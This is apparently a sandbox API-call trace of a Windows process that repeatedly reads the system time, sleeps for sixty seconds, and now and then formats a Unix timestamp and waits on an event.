	[0224.500] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6df47c80, dwHighDateTime=0x1d50a6a)) 
	[0224.500] Sleep (dwMilliseconds=0xea60) 
	[0224.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6df6dde0, dwHighDateTime=0x1d50a6a)) 
	[0224.522] Sleep (dwMilliseconds=0xea60) 
	[0224.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6df93f40, dwHighDateTime=0x1d50a6a)) 
	[0224.531] Sleep (dwMilliseconds=0xea60) 
	[0224.547] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dfba0a0, dwHighDateTime=0x1d50a6a)) 
	[0224.547] Sleep (dwMilliseconds=0xea60) 
	[0224.563] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6dfe0200, dwHighDateTime=0x1d50a6a)) 
	[0224.563] Sleep (dwMilliseconds=0xea60) 
	[0224.578] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e006360, dwHighDateTime=0x1d50a6a)) 
	[0224.578] Sleep (dwMilliseconds=0xea60) 
	[0224.595] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e02c4c0, dwHighDateTime=0x1d50a6a)) 
	[0224.595] Sleep (dwMilliseconds=0xea60) 
	[0224.609] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e052620, dwHighDateTime=0x1d50a6a)) 
	[0224.609] Sleep (dwMilliseconds=0xea60) 
	[0224.626] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e078780, dwHighDateTime=0x1d50a6a)) 
	[0224.626] Sleep (dwMilliseconds=0xea60) 
	[0224.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e09e8e0, dwHighDateTime=0x1d50a6a)) 
	[0224.642] Sleep (dwMilliseconds=0xea60) 
	[0224.656] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e0c4a40, dwHighDateTime=0x1d50a6a)) 
	[0224.656] Sleep (dwMilliseconds=0xea60) 
	[0224.672] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e0eaba0, dwHighDateTime=0x1d50a6a)) 
	[0224.672] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557858980\r\n") returned 12
	[0224.672] ResetEvent (hEvent=0xc) returned 1
	[0224.672] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0224.673] Sleep (dwMilliseconds=0xea60) 
	[0224.687] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e110d00, dwHighDateTime=0x1d50a6a)) 
	[0224.687] Sleep (dwMilliseconds=0xea60) 
	[0224.703] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e136e60, dwHighDateTime=0x1d50a6a)) 
	[0224.703] Sleep (dwMilliseconds=0xea60) 
	[0224.718] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e15cfc0, dwHighDateTime=0x1d50a6a)) 
	[0224.718] Sleep (dwMilliseconds=0xea60) 
	[0224.734] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e183120, dwHighDateTime=0x1d50a6a)) 
	[0224.734] Sleep (dwMilliseconds=0xea60) 
	[0224.750] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e1a9280, dwHighDateTime=0x1d50a6a)) 
	[0224.750] Sleep (dwMilliseconds=0xea60) 
	[0224.766] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e1cf3e0, dwHighDateTime=0x1d50a6a)) 
	[0224.766] Sleep (dwMilliseconds=0xea60) 
	[0224.784] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e1f5540, dwHighDateTime=0x1d50a6a)) 
	[0224.784] Sleep (dwMilliseconds=0xea60) 
	[0224.796] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e21b6a0, dwHighDateTime=0x1d50a6a)) 
	[0224.796] Sleep (dwMilliseconds=0xea60) 
	[0224.812] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e241800, dwHighDateTime=0x1d50a6a)) 
	[0224.812] Sleep (dwMilliseconds=0xea60) 
	[0224.828] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e267960, dwHighDateTime=0x1d50a6a)) 
	[0224.828] Sleep (dwMilliseconds=0xea60) 
	[0224.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e2d9d80, dwHighDateTime=0x1d50a6a)) 
	[0224.881] Sleep (dwMilliseconds=0xea60) 
	[0224.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e2ffee0, dwHighDateTime=0x1d50a6a)) 
	[0224.890] Sleep (dwMilliseconds=0xea60) 
	[0224.917] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e326040, dwHighDateTime=0x1d50a6a)) 
	[0224.917] Sleep (dwMilliseconds=0xea60) 
	[0224.922] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e34c1a0, dwHighDateTime=0x1d50a6a)) 
	[0224.922] Sleep (dwMilliseconds=0xea60) 
	[0224.937] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e372300, dwHighDateTime=0x1d50a6a)) 
	[0224.937] Sleep (dwMilliseconds=0xea60) 
	[0224.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e398460, dwHighDateTime=0x1d50a6a)) 
	[0224.953] Sleep (dwMilliseconds=0xea60) 
	[0224.968] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e3be5c0, dwHighDateTime=0x1d50a6a)) 
	[0224.968] Sleep (dwMilliseconds=0xea60) 
	[0225.030] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e456b40, dwHighDateTime=0x1d50a6a)) 
	[0225.031] Sleep (dwMilliseconds=0xea60) 
	[0225.046] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e47cca0, dwHighDateTime=0x1d50a6a)) 
	[0225.046] Sleep (dwMilliseconds=0xea60) 
	[0225.062] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e4a2e00, dwHighDateTime=0x1d50a6a)) 
	[0225.062] Sleep (dwMilliseconds=0xea60) 
	[0225.077] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e4c8f60, dwHighDateTime=0x1d50a6a)) 
	[0225.077] Sleep (dwMilliseconds=0xea60) 
	[0225.093] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e4ef0c0, dwHighDateTime=0x1d50a6a)) 
	[0225.093] Sleep (dwMilliseconds=0xea60) 
	[0225.108] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e515220, dwHighDateTime=0x1d50a6a)) 
	[0225.108] Sleep (dwMilliseconds=0xea60) 
	[0225.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e53b380, dwHighDateTime=0x1d50a6a)) 
	[0225.124] Sleep (dwMilliseconds=0xea60) 
	[0225.140] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e5614e0, dwHighDateTime=0x1d50a6a)) 
	[0225.140] Sleep (dwMilliseconds=0xea60) 
	[0225.155] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e587640, dwHighDateTime=0x1d50a6a)) 
	[0225.155] Sleep (dwMilliseconds=0xea60) 
	[0225.171] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a)) 
	[0225.171] Sleep (dwMilliseconds=0xea60) 
	[0225.186] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) 
	[0225.186] Sleep (dwMilliseconds=0xea60) 
	[0225.256] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e66be80, dwHighDateTime=0x1d50a6a)) 
	[0225.256] Sleep (dwMilliseconds=0xea60) 
	[0225.285] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6e6b8140, dwHighDateTime=0x1d50a6a)) 
	[0225.285] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557860781\r\n") returned 12
	[0225.285] ResetEvent (hEvent=0xc) returned 1
	[0225.285] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0228.402] Sleep (dwMilliseconds=0xea60) 
	[0228.436] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x702fc680, dwHighDateTime=0x1d50a6a)) 
	[0228.436] Sleep (dwMilliseconds=0xea60) 
	[0228.447] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x703227e0, dwHighDateTime=0x1d50a6a)) 
	[0228.447] Sleep (dwMilliseconds=0xea60) 
	[0228.463] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70348940, dwHighDateTime=0x1d50a6a)) 
	[0228.463] Sleep (dwMilliseconds=0xea60) 
	[0228.478] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7036eaa0, dwHighDateTime=0x1d50a6a)) 
	[0228.478] Sleep (dwMilliseconds=0xea60) 
	[0228.494] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70394c00, dwHighDateTime=0x1d50a6a)) 
	[0228.494] Sleep (dwMilliseconds=0xea60) 
	[0228.510] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x703bad60, dwHighDateTime=0x1d50a6a)) 
	[0228.510] Sleep (dwMilliseconds=0xea60) 
	[0228.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x703e0ec0, dwHighDateTime=0x1d50a6a)) 
	[0228.525] Sleep (dwMilliseconds=0xea60) 
	[0228.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x704eb860, dwHighDateTime=0x1d50a6a)) 
	[0228.645] Sleep (dwMilliseconds=0xea60) 
	[0228.657] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x705119c0, dwHighDateTime=0x1d50a6a)) 
	[0228.657] Sleep (dwMilliseconds=0xea60) 
	[0228.666] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70537b20, dwHighDateTime=0x1d50a6a)) 
	[0228.666] Sleep (dwMilliseconds=0xea60) 
	[0228.681] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7055dc80, dwHighDateTime=0x1d50a6a)) 
	[0228.681] Sleep (dwMilliseconds=0xea60) 
	[0228.697] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70583de0, dwHighDateTime=0x1d50a6a)) 
	[0228.697] Sleep (dwMilliseconds=0xea60) 
	[0228.857] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7061c360, dwHighDateTime=0x1d50a6a)) 
	[0228.857] Sleep (dwMilliseconds=0xea60) 
	[0228.868] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x706424c0, dwHighDateTime=0x1d50a6a)) 
	[0228.868] Sleep (dwMilliseconds=0xea60) 
	[0228.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70668620, dwHighDateTime=0x1d50a6a)) 
	[0228.885] Sleep (dwMilliseconds=0xea60) 
	[0228.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7068e780, dwHighDateTime=0x1d50a6a)) 
	[0228.900] Sleep (dwMilliseconds=0xea60) 
	[0229.266] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x707e53e0, dwHighDateTime=0x1d50a6a)) 
	[0229.266] Sleep (dwMilliseconds=0xea60) 
	[0229.274] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7080b540, dwHighDateTime=0x1d50a6a)) 
	[0229.274] Sleep (dwMilliseconds=0xea60) 
	[0229.290] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x708316a0, dwHighDateTime=0x1d50a6a)) 
	[0229.290] Sleep (dwMilliseconds=0xea60) 
	[0229.306] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70857800, dwHighDateTime=0x1d50a6a)) 
	[0229.306] Sleep (dwMilliseconds=0xea60) 
	[0229.324] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7087d960, dwHighDateTime=0x1d50a6a)) 
	[0229.324] Sleep (dwMilliseconds=0xea60) 
	[0229.337] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x708a3ac0, dwHighDateTime=0x1d50a6a)) 
	[0229.338] Sleep (dwMilliseconds=0xea60) 
	[0229.353] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x708c9c20, dwHighDateTime=0x1d50a6a)) 
	[0229.353] Sleep (dwMilliseconds=0xea60) 
	[0229.370] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x708efd80, dwHighDateTime=0x1d50a6a)) 
	[0229.370] Sleep (dwMilliseconds=0xea60) 
	[0229.385] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70915ee0, dwHighDateTime=0x1d50a6a)) 
	[0229.385] Sleep (dwMilliseconds=0xea60) 
	[0229.399] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7093c040, dwHighDateTime=0x1d50a6a)) 
	[0229.399] Sleep (dwMilliseconds=0xea60) 
	[0229.414] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x709621a0, dwHighDateTime=0x1d50a6a)) 
	[0229.415] Sleep (dwMilliseconds=0xea60) 
	[0229.435] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70988300, dwHighDateTime=0x1d50a6a)) 
	[0229.435] Sleep (dwMilliseconds=0xea60) 
	[0229.446] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x709ae460, dwHighDateTime=0x1d50a6a)) 
	[0229.446] Sleep (dwMilliseconds=0xea60) 
	[0229.461] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x709d45c0, dwHighDateTime=0x1d50a6a)) 
	[0229.461] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557862584\r\n") returned 12
	[0229.461] ResetEvent (hEvent=0xc) returned 1
	[0229.461] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0229.478] Sleep (dwMilliseconds=0xea60) 
	[0229.492] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70a20880, dwHighDateTime=0x1d50a6a)) 
	[0229.492] Sleep (dwMilliseconds=0xea60) 
	[0229.508] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70a469e0, dwHighDateTime=0x1d50a6a)) 
	[0229.508] Sleep (dwMilliseconds=0xea60) 
	[0229.523] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70a6cb40, dwHighDateTime=0x1d50a6a)) 
	[0229.523] Sleep (dwMilliseconds=0xea60) 
	[0229.539] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70a92ca0, dwHighDateTime=0x1d50a6a)) 
	[0229.539] Sleep (dwMilliseconds=0xea60) 
	[0229.555] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70ab8e00, dwHighDateTime=0x1d50a6a)) 
	[0229.555] Sleep (dwMilliseconds=0xea60) 
	[0229.570] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70adef60, dwHighDateTime=0x1d50a6a)) 
	[0229.570] Sleep (dwMilliseconds=0xea60) 
	[0229.586] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70b050c0, dwHighDateTime=0x1d50a6a)) 
	[0229.587] Sleep (dwMilliseconds=0xea60) 
	[0229.601] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70b2b220, dwHighDateTime=0x1d50a6a)) 
	[0229.601] Sleep (dwMilliseconds=0xea60) 
	[0229.617] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70b51380, dwHighDateTime=0x1d50a6a)) 
	[0229.617] Sleep (dwMilliseconds=0xea60) 
	[0229.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70b774e0, dwHighDateTime=0x1d50a6a)) 
	[0229.633] Sleep (dwMilliseconds=0xea60) 
	[0229.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70b9d640, dwHighDateTime=0x1d50a6a)) 
	[0229.648] Sleep (dwMilliseconds=0xea60) 
	[0229.664] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70bc37a0, dwHighDateTime=0x1d50a6a)) 
	[0229.664] Sleep (dwMilliseconds=0xea60) 
	[0229.680] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70be9900, dwHighDateTime=0x1d50a6a)) 
	[0229.680] Sleep (dwMilliseconds=0xea60) 
	[0229.695] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70c0fa60, dwHighDateTime=0x1d50a6a)) 
	[0229.695] Sleep (dwMilliseconds=0xea60) 
	[0229.710] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70c35bc0, dwHighDateTime=0x1d50a6a)) 
	[0229.710] Sleep (dwMilliseconds=0xea60) 
	[0229.726] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70c5bd20, dwHighDateTime=0x1d50a6a)) 
	[0229.726] Sleep (dwMilliseconds=0xea60) 
	[0229.742] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70c81e80, dwHighDateTime=0x1d50a6a)) 
	[0229.742] Sleep (dwMilliseconds=0xea60) 
	[0229.757] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70ca7fe0, dwHighDateTime=0x1d50a6a)) 
	[0229.757] Sleep (dwMilliseconds=0xea60) 
	[0229.773] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70cce140, dwHighDateTime=0x1d50a6a)) 
	[0229.773] Sleep (dwMilliseconds=0xea60) 
	[0229.789] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70cf42a0, dwHighDateTime=0x1d50a6a)) 
	[0229.789] Sleep (dwMilliseconds=0xea60) 
	[0229.805] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70d1a400, dwHighDateTime=0x1d50a6a)) 
	[0229.805] Sleep (dwMilliseconds=0xea60) 
	[0229.851] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70d8c820, dwHighDateTime=0x1d50a6a)) 
	[0229.851] Sleep (dwMilliseconds=0xea60) 
	[0229.866] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70db2980, dwHighDateTime=0x1d50a6a)) 
	[0229.867] Sleep (dwMilliseconds=0xea60) 
	[0229.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70dd8ae0, dwHighDateTime=0x1d50a6a)) 
	[0229.882] Sleep (dwMilliseconds=0xea60) 
	[0229.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70dfec40, dwHighDateTime=0x1d50a6a)) 
	[0229.898] Sleep (dwMilliseconds=0xea60) 
	[0229.914] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70e24da0, dwHighDateTime=0x1d50a6a)) 
	[0229.914] Sleep (dwMilliseconds=0xea60) 
	[0229.929] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70e4af00, dwHighDateTime=0x1d50a6a)) 
	[0229.929] Sleep (dwMilliseconds=0xea60) 
	[0229.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70e971c0, dwHighDateTime=0x1d50a6a)) 
	[0229.961] Sleep (dwMilliseconds=0xea60) 
	[0229.976] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70ebd320, dwHighDateTime=0x1d50a6a)) 
	[0229.976] Sleep (dwMilliseconds=0xea60) 
	[0229.991] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70ee3480, dwHighDateTime=0x1d50a6a)) 
	[0229.991] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557864385\r\n") returned 12
	[0229.991] ResetEvent (hEvent=0xc) returned 1
	[0229.991] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0230.054] Sleep (dwMilliseconds=0xea60) 
	[0230.069] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) 
	[0230.069] Sleep (dwMilliseconds=0xea60) 
